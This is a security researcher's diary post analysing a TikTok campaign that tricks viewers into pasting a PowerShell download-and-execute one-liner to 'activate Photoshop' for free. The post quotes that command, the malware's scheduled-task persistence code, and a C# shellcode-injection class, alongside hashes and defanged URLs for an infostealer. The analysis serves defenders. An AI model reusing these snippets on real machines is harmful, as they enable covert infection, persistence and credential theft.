Attackers are everywhere! They try to abuse victims using new communication channels and social engineering techniques! Somebody pointed my to the following Tik-Tok video: hxxps://vm[.]tiktok[.]com/ZGdaCkbEF/.

The author pretends to provide you an easy way to activate Photoshop for free:

Note that the video has already been liked more than 500 times!

The technique is similar to the ClickFix[1] attack scenario. The victim is asked to start a PowerShell as administrator and execute a one-liner:

iex (irm slmgr[.]win/photoshop)

When visiting this linlk, you'll get a piece of malicious PowerShell code that will be executed (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23). It has a VT score of 17/63[2]. Let’s have a look at it!

It downloads the next stage from https://file-epq[.]pages[.]dev/updater.exe. Persistence is implemented through a scheduled task to execute it at logon time:

$tasknames = @('MicrosoftEdgeUpdateTaskMachineCore','GoogleUpdateTaskMachineCore','AdobeUpdateTask','OfficeBackgroundTaskHandlerRegistration','WindowsUpdateCheck')
$taskname = $tasknames[(Get-Random -Max 5)]
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -ExecutionPolicy Bypass -Command `"$scr`""
$trigger = New-ScheduledTaskTrigger -AtLogOn
$principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -DontStopOnIdleEnd
Register-ScheduledTask -TaskName $taskname -Action $action -Trigger $trigger -Principal $principal -Settings $settings -Force -ErrorAction SilentlyContinue | Out-Null

Updater.exe (SHA256:58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8) is an AuroStealer[3].

Finally, a second payload is downloaded and executed: source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011)[4]. This one implements an interesting technique, it compiles some code on demand during its execution:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline"

This is something that I covered in previous diaries ("self-compiling malware")[5]. The compile code is a class used to inject a shellcode in memory:

using System;
using System.Runtime.InteropServices; 
public class SC { 
    [DllImport("kernel32.dll")] 
    public static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p); 
    [DllImport("kernel32.dll")] 
    public static extern IntPtr CreateThread(IntPtr a, uint s, IntPtr addr, IntPtr p, uint f, IntPtr t); 
    [DllImport("kernel32.dll")] 
    public static extern uint WaitForSingleObject(IntPtr h, uint m); 
    public static void Run(byte[] sc) { 
      IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40); 
      Marshal.Copy(sc, 0, addr, sc.Length); 
      IntPtr t = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 
      WaitForSingleObject(t, 0xFFFFFFFF); 
    } 
}

While invetigating this piece of malware, I discovered more videos from the same campaing but using other software names:

• hxxps://vm[.]tiktok[.]com/ZGdaC7EQY/
• hxxps://vm[.]tiktok[.]com/ZGdaX8jVq/

Stay safe and don't trust such videos!

[1] https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
[2] https://www.virustotal.com/gui/file/6d897b5661aa438a96ac8695c54b7c4f3a1fbf1b628c8d2011e50864860c6b23
[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.aurastealer
[4] https://www.virustotal.com/gui/file/db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011
[5] https://isc.sans.edu/diary/Malware+Samples+Compiling+Their+Next+Stage+on+Premise/25278

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key